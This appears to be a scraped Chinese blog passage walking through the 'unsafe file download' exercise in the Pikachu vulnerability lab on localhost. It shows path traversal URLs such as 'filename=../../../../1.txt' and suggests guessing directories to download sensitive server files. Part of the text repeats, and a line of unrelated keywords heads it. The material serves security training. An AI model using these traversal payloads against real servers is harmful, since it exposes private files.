企业网站后台管理软件,wordpress获取数据库的值,随州王章欣,中细软做的网站0x02文件下载
# 首先看到界面都是对图片的下载#xff0c;然后我们需要对其中一张照片进行下载#xff0c;查看它的文件地址可以发现
http://127.0.0.1/pikachu-master/vul/unsafedownload/execdownload.php?filenameai.png# 看到链接后发现我们可以修改我们想要传的的路径…
0x02文件下载
# 首先看到界面都是对图片的下载然后我们需要对其中一张照片进行下载查看它的文件地址可以发现
http://127.0.0.1/pikachu-master/vul/unsafedownload/execdownload.php?filenameai.png# 看到链接后发现我们可以修改我们想要传的的路径来对其进行文件上传
http://127.0.0.1/pikachu-master/vul/unsafedownload/execdownload.php?filename1.php# 可以看到显示的文件不存在因此我们需要构造路径来对文件进行上传
http://127.0.0.1/pikachu-master/vul/unsafedownload/execdownload.php?filename../../../../1.txt发现文件开始下载因此我们可以确定存在 Unsafe file download 漏洞。可以进行 …/ 返回上一级再进行猜目录等构造更复杂的下载路径来下载服务器中的敏感文件。 # 可以推断上一层的文件down_nba.php
http://127.0.0.1/pikachu-master/vul/unsafedownload/execdownload.php?filename../down_nba.php可以看到下载成功。 好小子离成功又近一步